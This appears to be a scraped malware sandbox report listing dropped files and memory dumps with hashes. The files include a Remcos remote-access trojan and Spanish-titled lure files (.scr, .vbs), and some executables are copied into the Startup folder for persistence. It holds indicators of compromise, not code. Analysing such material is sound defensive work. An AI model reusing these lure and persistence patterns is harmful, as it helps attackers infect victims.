495ce2ff1808b5c1beb86361952da83ab852af16dd1269738fc36e0f9056bdbf9c846f014ba01e347b1b84113f2d55aca068ec7d2de18edfb543fc32c0c8ef0a

Download Submit
C:\ProgramData\Remcos\remcos.exe

Filesize
824KB

MD5
aff92b2a3a2d7519fa278a0fc1431011

SHA1
d8a9ee6ce435d9827bae7505d714310e833b706d

SHA256
f7ecefbcf3572d8b3f40ab5c23b1a62366bb8d49b603b3d54e4b46bcd6779eee

SHA512
495ce2ff1808b5c1beb86361952da83ab852af16dd1269738fc36e0f9056bdbf9c846f014ba01e347b1b84113f2d55aca068ec7d2de18edfb543fc32c0c8ef0a

Download Submit
C:\ProgramData\Remcos\remcos.exe

Filesize
824KB

MD5
aff92b2a3a2d7519fa278a0fc1431011

SHA1
d8a9ee6ce435d9827bae7505d714310e833b706d

SHA256
f7ecefbcf3572d8b3f40ab5c23b1a62366bb8d49b603b3d54e4b46bcd6779eee

SHA512
495ce2ff1808b5c1beb86361952da83ab852af16dd1269738fc36e0f9056bdbf9c846f014ba01e347b1b84113f2d55aca068ec7d2de18edfb543fc32c0c8ef0a

Download Submit
C:\ProgramData\Remcos\remcos.exe

Filesize
824KB

MD5
aff92b2a3a2d7519fa278a0fc1431011

SHA1
d8a9ee6ce435d9827bae7505d714310e833b706d

SHA256
f7ecefbcf3572d8b3f40ab5c23b1a62366bb8d49b603b3d54e4b46bcd6779eee

SHA512
495ce2ff1808b5c1beb86361952da83ab852af16dd1269738fc36e0f9056bdbf9c846f014ba01e347b1b84113f2d55aca068ec7d2de18edfb543fc32c0c8ef0a

Download Submit
C:\ProgramData\Remcos\remcos.exe

Filesize
824KB

MD5
aff92b2a3a2d7519fa278a0fc1431011

SHA1
d8a9ee6ce435d9827bae7505d714310e833b706d

SHA256
f7ecefbcf3572d8b3f40ab5c23b1a62366bb8d49b603b3d54e4b46bcd6779eee

SHA512
495ce2ff1808b5c1beb86361952da83ab852af16dd1269738fc36e0f9056bdbf9c846f014ba01e347b1b84113f2d55aca068ec7d2de18edfb543fc32c0c8ef0a

Download Submit
C:\ProgramData\Remcos\remcos.exe

Filesize
824KB

MD5
aff92b2a3a2d7519fa278a0fc1431011

SHA1
d8a9ee6ce435d9827bae7505d714310e833b706d

SHA256
f7ecefbcf3572d8b3f40ab5c23b1a62366bb8d49b603b3d54e4b46bcd6779eee

SHA512
495ce2ff1808b5c1beb86361952da83ab852af16dd1269738fc36e0f9056bdbf9c846f014ba01e347b1b84113f2d55aca068ec7d2de18edfb543fc32c0c8ef0a

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
8de6c60f04181ad55cc1e27260334c09

SHA1
bd822cbf95cc9859a3ba2c89887e958468c5bdce

SHA256
1196165e21d21989c71335749f076f0c3c31c7d849e0cbdf8c7120be34ce1440

SHA512
9527311a1dc27668023626f425308c1669e56c047c07df9ec3301aab365a7a8c5c27bca7d502fcf7f42dd1a9ba64ae895523a4aeb23e7ffcd71e15ff7a8c35a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Powershell.exe.log

Filesize
1KB

MD5
5315900105942deb090a358a315b06fe

SHA1
22fe5d2e1617c31afbafb91c117508d41ef0ce44

SHA256
e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7

SHA512
77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
d966b70149bf4f239ccecbcfc80708e0

SHA1
bdca0687b4f27ab5904ba33d0faeb6959634c5ff

SHA256
18dc72d56894da34142440e2e6ead50364f26e0b6e8ceb7e4763d52a8f7263ef

SHA512
37a94832153cc4ca718fc72a8e5d45474b7895c22d92d61ed3970b5f562a9bca91a5c87bab9457fc01e546bb9bf0ae1f5f6624b0f9396eec1425e23540bfe16d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
d966b70149bf4f239ccecbcfc80708e0

SHA1
bdca0687b4f27ab5904ba33d0faeb6959634c5ff

SHA256
18dc72d56894da34142440e2e6ead50364f26e0b6e8ceb7e4763d52a8f7263ef

SHA512
37a94832153cc4ca718fc72a8e5d45474b7895c22d92d61ed3970b5f562a9bca91a5c87bab9457fc01e546bb9bf0ae1f5f6624b0f9396eec1425e23540bfe16d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
99235136c2a3ffa47d0a206049d27ce6

SHA1
c0d2dd2948c613decf153f1a811f9e350d38a3d6

SHA256
20f675cc357f617e53dcce16def727cf7498c8ec332b12dc39d5498de5867ad2

SHA512
e79d91faf2630cf6c2a2d97ab43dc8bdd408fb7e5471e9925dad7333fd5321e64b89fef176c15329cdded334e5a9177371581407299fcc8969e642e5b9c84fa5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
948edb2ca66ab35521d57af4b95cfabf

SHA1
25eddd22bb25880744f88e7eaf93489f2ebb4c3d

SHA256
675ea91b31879f6455b33838ae4604cae0c0275c6caf27afa729a16302dbfc3a

SHA512
38b6c009be58f0d055ed012e2ac9db14a6a93ee043bdaf86165e4341d7d16761b56691eaf3183adea7e125a0be5f0c3d56f99766cc0fde74077d04a732869a66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
948edb2ca66ab35521d57af4b95cfabf

SHA1
25eddd22bb25880744f88e7eaf93489f2ebb4c3d

SHA256
675ea91b31879f6455b33838ae4604cae0c0275c6caf27afa729a16302dbfc3a

SHA512
38b6c009be58f0d055ed012e2ac9db14a6a93ee043bdaf86165e4341d7d16761b56691eaf3183adea7e125a0be5f0c3d56f99766cc0fde74077d04a732869a66

Download Submit
C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.scr

Filesize
824KB

MD5
aff92b2a3a2d7519fa278a0fc1431011

SHA1
d8a9ee6ce435d9827bae7505d714310e833b706d

SHA256
f7ecefbcf3572d8b3f40ab5c23b1a62366bb8d49b603b3d54e4b46bcd6779eee

SHA512
495ce2ff1808b5c1beb86361952da83ab852af16dd1269738fc36e0f9056bdbf9c846f014ba01e347b1b84113f2d55aca068ec7d2de18edfb543fc32c0c8ef0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.scr

Filesize
824KB

MD5
aff92b2a3a2d7519fa278a0fc1431011

SHA1
d8a9ee6ce435d9827bae7505d714310e833b706d

SHA256
f7ecefbcf3572d8b3f40ab5c23b1a62366bb8d49b603b3d54e4b46bcd6779eee

SHA512
495ce2ff1808b5c1beb86361952da83ab852af16dd1269738fc36e0f9056bdbf9c846f014ba01e347b1b84113f2d55aca068ec7d2de18edfb543fc32c0c8ef0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.scr

Filesize
824KB

MD5
aff92b2a3a2d7519fa278a0fc1431011

SHA1
d8a9ee6ce435d9827bae7505d714310e833b706d

SHA256
f7ecefbcf3572d8b3f40ab5c23b1a62366bb8d49b603b3d54e4b46bcd6779eee

SHA512
495ce2ff1808b5c1beb86361952da83ab852af16dd1269738fc36e0f9056bdbf9c846f014ba01e347b1b84113f2d55aca068ec7d2de18edfb543fc32c0c8ef0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.scr

Filesize
824KB

MD5
aff92b2a3a2d7519fa278a0fc1431011

SHA1
d8a9ee6ce435d9827bae7505d714310e833b706d

SHA256
f7ecefbcf3572d8b3f40ab5c23b1a62366bb8d49b603b3d54e4b46bcd6779eee

SHA512
495ce2ff1808b5c1beb86361952da83ab852af16dd1269738fc36e0f9056bdbf9c846f014ba01e347b1b84113f2d55aca068ec7d2de18edfb543fc32c0c8ef0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.scr

Filesize
824KB

MD5
aff92b2a3a2d7519fa278a0fc1431011

SHA1
d8a9ee6ce435d9827bae7505d714310e833b706d

SHA256
f7ecefbcf3572d8b3f40ab5c23b1a62366bb8d49b603b3d54e4b46bcd6779eee

SHA512
495ce2ff1808b5c1beb86361952da83ab852af16dd1269738fc36e0f9056bdbf9c846f014ba01e347b1b84113f2d55aca068ec7d2de18edfb543fc32c0c8ef0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA.vbs

Filesize
217KB

MD5
507c852d53b771937d44ead89ce445db

SHA1
2f17ed49c003a72b62999ce724ff28f4eafaed04

SHA256
7bec8c3246503b9a6af722a1f3316a2237b1403042b1879bf2372c4dd3a54d83

SHA512
94214e31e75cd14893282e6c06b66b66a2329d4bbe5902c143fcd1721004e5a8bc477ac38f8baa093855ddb4a2a9e1cfddbcba1380af9eeadd4c85fe146a4a38

Download Submit
C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA9-07.scr

Filesize
374KB

MD5
ba576a58775f397175afb3c6489ce7a6

SHA1
1d360275e14ba307b8d890df12dbab3d3c1a46c2

SHA256
90513b75e86063db47f5ab12981e611e1bdad8bd094c062c6c61aa761d7de8fa

SHA512
e503cb59d691fcf135442e99eba39b01ce908eae0625d7484f35055275090746e60ec60e0734e342a4c7a02aebeb20f6e2781da9a1409d24c4d6c5a855a06372

Download Submit
C:\Users\Admin\AppData\Local\Temp\CARPETA DE FOLIO Y ACTA ENTREGADA9-07.scr

Filesize
374KB

MD5
ba576a58775f397175afb3c6489ce7a6

SHA1
1d360275e14ba307b8d890df12dbab3d3c1a46c2

SHA256
90513b75e86063db47f5ab12981e611e1bdad8bd094c062c6c61aa761d7de8fa

SHA512
e503cb59d691fcf135442e99eba39b01ce908eae0625d7484f35055275090746e60ec60e0734e342a4c7a02aebeb20f6e2781da9a1409d24c4d6c5a855a06372

Download Submit
C:\Users\Admin\AppData\Local\Temp\HGDBCGFHJHMBNHJUFUYTHGFTRGDB.pdf

Filesize
112KB

MD5
238e8416d317ec42a14f2ba41e3dfcf4

SHA1
b5a2b1864e5daffd1adabc463975f98783845633

SHA256
299e149cf809474d19d823ea9fd6e8d7b1403c5040bb85a29b02e9624c022988

SHA512
0a6af03d8601ddf536aef607875989eda2efc074ad0124acb399688e648efa655d9f4f3b2a57ff6c69fabd95795b7a2d40e02b6aeec88d7657edbceb9b00729f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j3ugk4r2.iao.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anymr.exe

Filesize
824KB

MD5
aff92b2a3a2d7519fa278a0fc1431011

SHA1
d8a9ee6ce435d9827bae7505d714310e833b706d

SHA256
f7ecefbcf3572d8b3f40ab5c23b1a62366bb8d49b603b3d54e4b46bcd6779eee

SHA512
495ce2ff1808b5c1beb86361952da83ab852af16dd1269738fc36e0f9056bdbf9c846f014ba01e347b1b84113f2d55aca068ec7d2de18edfb543fc32c0c8ef0a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anymr.exe

Filesize
824KB

MD5
aff92b2a3a2d7519fa278a0fc1431011

SHA1
d8a9ee6ce435d9827bae7505d714310e833b706d

SHA256
f7ecefbcf3572d8b3f40ab5c23b1a62366bb8d49b603b3d54e4b46bcd6779eee

SHA512
495ce2ff1808b5c1beb86361952da83ab852af16dd1269738fc36e0f9056bdbf9c846f014ba01e347b1b84113f2d55aca068ec7d2de18edfb543fc32c0c8ef0a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mrnjhdf.exe

Filesize
374KB

MD5
ba576a58775f397175afb3c6489ce7a6

SHA1
1d360275e14ba307b8d890df12dbab3d3c1a46c2

SHA256
90513b75e86063db47f5ab12981e611e1bdad8bd094c062c6c61aa761d7de8fa

SHA512
e503cb59d691fcf135442e99eba39b01ce908eae0625d7484f35055275090746e60ec60e0734e342a4c7a02aebeb20f6e2781da9a1409d24c4d6c5a855a06372

Download Submit
memory/2672-212-0x0000000002310000-0x0000000002320000-memory.dmp

Filesize
64KB

Download
memory/2672-288-0x0000000006CC0000-0x0000000006D56000-memory.dmp

Filesize
600KB

Download
memory/2672-209-0x0000000002310000-0x0000000002320000-memory.dmp

Filesize
64KB

Download
memory/2724-164-0x0000000005B00000-0x0000000005B22000-memory.dmp

Filesize
136KB

Download
memory/2724-160-0x00000000054D0000-0x0000000005506000-memory.dmp

Filesize
216KB

Download
memory/2724-161-0x0000000005C10000-0x0000000006238000-memory.dmp

Filesize
6.2MB

Download
memory/2724-162-0x00000000055D0000-0x00000000055E0000-memory.dmp

Filesize
64KB

Download
memory/2724-163-0x00000000055D0000-0x00000000055E0000-memory.dmp

Filesize
64KB

Download
memory/2724-177-0x00000000068B0000-0x00000000068CE000-memory.dmp

Filesize
120KB

Download
memory/2724-172-0x00000000063C0000-0x0000000006426000-memory.dmp

Filesize
408KB

Download
memory/2724-166-0x00000000062E0000-0x0000000006346000-memory.dmp

Filesize
408KB

Download
memory/3144-415-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/3144-426-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/3204-446-0x0000000004D10000-0x0000000004D20000-memory.dmp

Filesize
64KB

Download
memory/3204-447-0x0000000004D10000-0x0000000004D20000-memory.dmp

Filesize
64KB

Download
memory/3292-207-0x0000000002710000-0x0000000002720000-memory.dmp

Filesize
64KB

Download
memory/3292-290-0x0000000006450000-0x000000000646A000-memory.dmp

Filesize
104KB

Download
memory/3292-294-0x00000000064B0000-0x00000000064D2000-memory.dmp

Filesize
136KB

Download
memory/3292-206-0x0000000002710000-0x0000000002720000-memory.dmp

Filesize
64KB

Download
memory/3312-414-0x00000000024B0000-0x00000000024C0000-memory.dmp

Filesize
64KB

Download
memory/3312-340-0x00000000024B0000-0x00000000024C0000-memory.dmp

Filesize
64KB

Download
memory/3312-413-0x00000000024B0000-0x00000000024C0000-memory.dmp

Filesize
64KB

Download
memory/3320-547-0x0000000005040000-0x0000000005050000-memory.dmp

Filesize
64KB

Download
memory/3320-444-0x0000000005040000-0x0000000005050000-memory.dmp

Filesize
64KB

Download
memory/3320-338-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/3320-530-0x0000000005280000-0x000000000528A000-memory.dmp

Filesize
40KB

Download
memory/3568-531-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/3568-558-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/4464-215-0x0000000005010000-0x0000000005020000-memory.dmp

Filesize
64KB

Download
memory/4536-159-0x0000000001B10000-0x0000000001B20000-memory.dmp

Filesize
64KB

Download
memory/4536-341-0x0000000001B10000-0x0000000001B20000-memory.dmp

Filesize
64KB

Download
memory/4536-343-0x0000000005BB0000-0x0000000005BB1000-memory.dmp

Filesize
4KB

Download
memory/4536-157-0x0000000005B50000-0x0000000005B62000-memory.dmp

Filesize
72KB

Download
memory/4536-155-0x00000000061A0000-0x0000000006744000-memory.dmp

Filesize
5.6MB

Download
memory/4536-147-0x0000000000FA0000-0x0000000001074000-memory.dmp

Filesize
848KB

Download
memory/4828-240-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-178-0x0000000005DE0000-0x0000000005E7C000-memory.dmp

Filesize
624KB

Download
memory/4828-220-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-225-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-211-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-267-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-228-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-232-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-236-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-208-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-261-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-217-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-244-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-158-0x0000000005190000-0x00000000051A0000-memory.dmp

Filesize
64KB

Download
memory/4828-248-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-251-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-255-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-156-0x0000000005280000-0x0000000005312000-memory.dmp

Filesize
584KB

Download
memory/4828-281-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-277-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-272-0x0000000005720000-0x0000000005743000-memory.dmp

Filesize
140KB

Download
memory/4828-154-0x0000000000930000-0x0000000000994000-memory.dmp

Filesize
400KB

Download
memory/4968-441-0x0000000004D60000-0x0000000004D70000-memory.dmp

Filesize
64KB

Download